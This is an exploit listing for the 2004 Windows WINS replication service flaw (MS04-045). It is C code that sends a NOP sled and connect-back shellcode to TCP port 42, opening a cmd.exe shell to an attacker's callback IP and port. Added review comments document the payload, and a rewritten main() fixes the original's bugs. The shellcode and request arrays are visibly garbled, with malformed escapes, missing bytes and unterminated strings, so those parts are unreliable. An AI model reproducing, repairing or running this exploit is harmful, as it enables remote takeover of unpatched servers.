Microsoft WINS Remote Code Execution Exploit (MS04-045)


Date: 31/12/2004

CAN-2004-1080 (now CVE-2004-1080)

/**************************************************************/
/* zucwins 0.1 - WINS 2000 remote root exploit                */
/* Exploit by: ZUC                                            */
/* Works on Windows 2000 SP3/SP4, probably every language     */
/* Successfully tested by K-OTik Security on Win2k English    */
/* and French                                                 */
/**************************************************************/

/* The header names were lost from this listing (every line read just
 * "#include"); these are the headers the code below actually needs. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/*
 * Win32 connect-back payload delivered inside the NOP sled.
 *
 * NOTE(review): the listing is damaged.  Escapes appear as "/ xNN" instead
 * of "\xNN", the 9th line contains "/ x1" with a digit missing, and several
 * lines carry fewer than the 15 bytes of their neighbours (e.g. the lines
 * ending "x01 / xfe" and "x35 / x93 / x93" have 12), so bytes were dropped
 * during extraction and this array cannot be rebuilt from here.
 *
 * What the surviving bytes do show:
 *   - offset 0: EB 25, a short jump over the data block that follows;
 *   - offsets 2-3 and 4-7: the callback port and IPv4 address.  main()
 *     writes them in after XORing with 0x9393 / 0x93939393.  The code
 *     later does mov eax,[ebp+4] / xor eax,0x93939393 and
 *     mov ax,[ebp+2] / xor ax,0x9393 (bytes 8b 45 04 35 93 93 ... and
 *     66 8b 45 02 66 35 93 93), i.e. it unmasks them in place -- presumably
 *     the masking keeps NUL bytes out of the address;
 *   - the call/pop pair at offsets 37-44 (eb 05 e8 f9 ff ff ff 5d) followed
 *     by sub ebp,0x2c (83 ed 2c) leaves ebp pointing at offset 0, which is
 *     why [ebp+2] and [ebp+4] are the port and address slots;
 *   - the strings "WS2_32.DLL" and "cmd.exe" are embedded, so the payload
 *     appears to load Winsock and spawn a shell on the callback socket
 *     (the exact control flow was not verified from this listing).
 *
 * main() patches this array, so it must remain a writable, non-const
 * object.
 */
Char shellcode [] =

"/ XEB / X25 / XE9 / XFA / X99 / XD3 / X77 / XF6 / X02 / X06 / X6C / X59 / X6C / X59 / XF8"

"/ X1D / X9C / XDE / X8C / XD1 / X4C / X70 / XD4 / X03 / X58 / X46 / X57 / X53 / X32 / X5F"

"/ x33 / x32 / x2e / x44 / x4c / x4c / x01 / Xeb / x05 / XE8 / XF9 / XFF / XFF / XFF / X5D"

"/ X83 / XED / X2C / X6A / X30 / X59 / X64 / X8B / X01 / X8B / X40 / X0C / X8B / X70 / X1C"

"/ XAD / X8B / X78 / X08 / X8D / X5F / X3C / X8B / X1B / X01 / XFB / X8B / X5B / X78 / X01"

"/ xfb / x8b / x4b / x1c / x01 / x01 / x53 / x24 / x01 / xfa / x53 / x51 / x52 / x8b"

"/ x5b / x20 / x01 / x41 / x31 / xc0 / x99 / x8b / x34 / x8b / x01 / xfe"

"/ XAC / X31 / XC2 / XD1 / XE2 / X84 / XC0 / X75 / XF7 / X0F / XB6 / X45 / X09 / X8D / X44"

"/ x45 / x08 / x75 / x1 / x66 / x31 / x10 / x5a / x58 / x5e / x56 / x50"

"/ X52 / X2B / X4E / X10 / X41 / X0F / XB7 / X0C / X4A / X8B / X04 / X88 / X01 / XF8 / X0F"

"/ XB6 / X4D / X09 / X89 / XFE / X0D / X09 / X75 / XBE / XFE / X4D / X08" "/ X74 / X17 / XFE / X4D / X24 / X8D / X5D / X1A / X53 / XFF / XD0 / X89 / XC7 / X6A / X02 "

"/ x58 / x88 / x45 / x09 / x0c / x45 / x79 / x0c / Xeb / x82 / x50 / x8b / x45 / x04 / x35"

"/ x93 / x93 / x45 / x04 / x66 / x8b / x45 / x02 / x66 / x35 / x93 / x93"

"/ x66 / x89 / x45 / x02 / x58 / x89 / xce / x31 / xdb / x53 / x53 / x53 / x53 / x56 / x46"

"/ X56 / XFF / XD0 / X89 / XC7 / X55 / X58 / X66 / X89 / X30 / X6A / X10 / X55 / X57 / XFF"

"/ x55 / x88 / x50 / xff / x55 / xe8 / x55 / x55 / xff / x55 / XEC / X8D"

"/ x44 / x05 / x68 / x2e / x65 / x78 / x65 / x68 / x5c / x63 / x6d / x64"

"/ X94 / X31 / XD2 / X8D / X45 / XCC / X94 / X57 / X57 / X57 / X53 / X53 / XFE / XCA / X01"

"/ XF2 / X52 / X94 / X8D / X45 / X78 / X50 / X8D / X45 / X88 / X50 / XB1 / X08 / X53 / X53"

"/ X6A / X10 / XFE / XCE / X52 / X53 / X53 / X53 / X55 / XFF / X55 / XF0 / X6A / XFF / XFF"

"/ x55 / xe4";

/*
 * Leading bytes of the request main() sends to the WINS replication
 * service on TCP/42; main() copies sizeof(mess) - 1 bytes of it and then
 * appends 30 copies of rep[].
 *
 * NOTE(review): the literal is damaged in this listing -- escapes appear
 * as "/ xNN", the commented-out second line is a dead duplicate of the
 * first, and the string that begins on the next line is split across two
 * lines and has lost its closing quote and the ';'.  sizeof(mess) cannot be
 * trusted from here, and the field meanings were not recovered.
 */
Char mess [] =

"/ x00 / x03 / x77 / x4c / x77 / x05 / x4e / x00 / x3c / x01 / x02 / x03 / x04"

// "/ x00 / x03 / x77 / x4c / x77 / x05 / x4e / x00 / x3c / x01 / x02 / x03 / x04"

"/ X6C / X00 / X02 / X4E / X05 / X00 / X00 / X02 / X4E / X05 / X00 / X02 /

X02 / X02 / X05 / X00 / X00 / X02 / X02 / X05 / X00 / X02 / X4E / X05 "

/*
 * Block that main() appends 30 times after mess[] (sizeof(rep) - 1 bytes
 * per copy, i.e. without the terminator) before the NOP sled.
 *
 * NOTE(review): same extraction damage as mess[] -- "/ xNN" escapes, the
 * literal is split across two lines, and the terminating ';' is missing.
 */
Char rep [] =

"/ x05 / x01 / x00 / x4e / x05 / x90 / x00 / x4e / x05 / x90 / x00 / x4e / x05 / x90 / x00 /

X4E / X05 / X90 / X00 / X00 / X4E / X05 / X90 / X03 / X4E / X05 / X90 / X00 / X00 / X4E / X05 "

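/* Print the command-line synopsis and exit; defined below main(). */
void usage(void);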

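/*
 * Program entry point.
 *
 *   zucwins <target-host> <callback-ip> <callback-port>
 *
 * Assembles the request in one heap buffer -- mess[], then 30 copies of
 * rep[], then a 200 000-byte NOP sled with shellcode[] copied in 198 000
 * bytes into the sled, then sizeof(shellcode) trailing zero bytes (the
 * original listing sent those as well) -- patches the XOR-masked callback
 * port and address into shellcode[2..7], connects to TCP/42 on the target,
 * sends the buffer, waits five seconds and closes the socket.
 *
 * Returns EXIT_SUCCESS once the whole buffer has been sent.  Any argument,
 * resolution or socket error is reported on stderr and yields
 * EXIT_FAILURE.
 *
 * Differences from the original listing, all defects there: the target
 * hostname is actually resolved (gethostbyname() was called and its result
 * thrown away, so only dotted quads worked); socket()/connect()/send()
 * results are checked (the original tested `!sock`, which never fires,
 * since socket() returns -1 on failure); the port is range-checked instead
 * of trusting atoi(); the 410 KB of fixed stack arrays are replaced by one
 * exactly-sized heap buffer; and the two never-opened descriptors that
 * were shutdown()/close()d at the end are gone.
 */
int main(int argc, char *argv[])
{
    enum {
        WINS_PORT   = 42,       /* WINS replication listens on TCP/42 */
        SLED_LEN    = 200000,   /* NOP sled length used by the original */
        CODE_OFFSET = 198000,   /* where shellcode[] lands inside the sled */
        REP_COUNT   = 30        /* copies of rep[] after the header */
    };
    /* Masks applied to the callback address.  The shellcode XORs with the
     * same constants at run time, so they must not change independently. */
    const uint32_t xor_ip = 0x93939393u;
    const uint16_t xor_port = 0x9393u;

    unsigned char *buf = NULL;
    struct addrinfo *res = NULL;
    int sock = -1;
    int status = EXIT_FAILURE;

    if (argc != 4) {
        usage();                /* exits; the return is belt and braces */
        return EXIT_FAILURE;
    }

    /* Callback port: reject junk and out-of-range values instead of
     * silently sending whatever atoi() produced. */
    errno = 0;
    char *end = NULL;
    long port = strtol(argv[3], &end, 10);
    if (end == argv[3] || *end != '\0' || errno == ERANGE ||
        port < 1 || port > 65535) {
        fprintf(stderr, "[-] Invalid callback port: %s\n", argv[3]);
        return EXIT_FAILURE;
    }

    /* Callback address must be a dotted quad; inet_pton() reports failure
     * unambiguously, unlike inet_addr(). */
    struct in_addr cb_addr;
    if (inet_pton(AF_INET, argv[2], &cb_addr) != 1) {
        fprintf(stderr, "[-] Invalid callback IP: %s\n", argv[2]);
        return EXIT_FAILURE;
    }

    /* Both values are kept in network byte order and then masked; the
     * shellcode reads them back from its own offsets 2 and 4. */
    uint16_t cbport = (uint16_t)(htons((uint16_t)port) ^ xor_port);
    uint32_t cbip = cb_addr.s_addr ^ xor_ip;
    memcpy(&shellcode[2], &cbport, sizeof cbport);
    memcpy(&shellcode[4], &cbip, sizeof cbip);

    /* Build the request.  sizeof(x) - 1 drops the string terminator of the
     * two header fragments; shellcode[] keeps its NUL, as the original did. */
    const size_t hdr_len = sizeof(mess) - 1;
    const size_t rep_len = sizeof(rep) - 1;
    const size_t total = hdr_len + (size_t)REP_COUNT * rep_len +
                         SLED_LEN + sizeof(shellcode);

    buf = calloc(total, 1);
    if (buf == NULL) {
        perror("calloc");
        return EXIT_FAILURE;
    }

    size_t off = 0;
    memcpy(buf + off, mess, hdr_len);
    off += hdr_len;
    for (int r = 0; r < REP_COUNT; r++) {
        memcpy(buf + off, rep, rep_len);
        off += rep_len;
    }
    memset(buf + off, 0x90, SLED_LEN);
    memcpy(buf + off + CODE_OFFSET, shellcode, sizeof(shellcode));
    /* Everything after the sled stays zero (calloc), matching the
     * original buffer, which was memset to 0 before use. */

    /* Resolve the target; a hostname works now, not only a dotted quad. */
    struct addrinfo hints;
    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    char portstr[16];
    snprintf(portstr, sizeof portstr, "%d", WINS_PORT);
    int gai = getaddrinfo(argv[1], portstr, &hints, &res);
    if (gai != 0) {
        fprintf(stderr, "[-] Cannot resolve %s: %s\n", argv[1],
                gai_strerror(gai));
        goto out;
    }

    sock = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
    if (sock < 0) {
        perror("socket");
        goto out;
    }

    printf("[*] Connecting the target\n");
    if (connect(sock, res->ai_addr, res->ai_addrlen) < 0) {
        perror("connect");
        goto out;
    }

    printf("[*] Sending exploit\n");
    size_t sent = 0;
    while (sent < total) {
        /* send() may write less than asked on a stream socket. */
        ssize_t n = send(sock, buf + sent, total - sent, 0);
        if (n < 0) {
            perror("send");
            goto out;
        }
        sent += (size_t)n;
    }
    printf("[*] Exploit sent\n");

    /* The original paused before tearing the connection down -- presumably
     * to let the server consume the request before it sees the close. */
    sleep(5);
    shutdown(sock, SHUT_WR);
    status = EXIT_SUCCESS;

out:
    if (sock >= 0) {
        close(sock);
    }
    if (res != NULL) {
        freeaddrinfo(res);
    }
    free(buf);
    return status;
}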

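/*
 * Print the command-line synopsis and terminate.
 *
 * Argument order is <target host> <callback IP> <callback port>, as the
 * sample line shows.  Writes to stderr rather than stdout so the text does
 * not pollute piped output, and exits with a failure status (the original
 * returned 0 on a usage error, which hides the mistake from scripts).
 * The unused local `unsigned int a` of the original is dropped.
 */
void usage(void)
{
    fprintf(stderr, "\nusage:\n");
    fprintf(stderr, "Sample: Zuc-Winshit www.vulnwins.com 31.33.7.23 31337\n\n");
    exit(EXIT_FAILURE);
}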
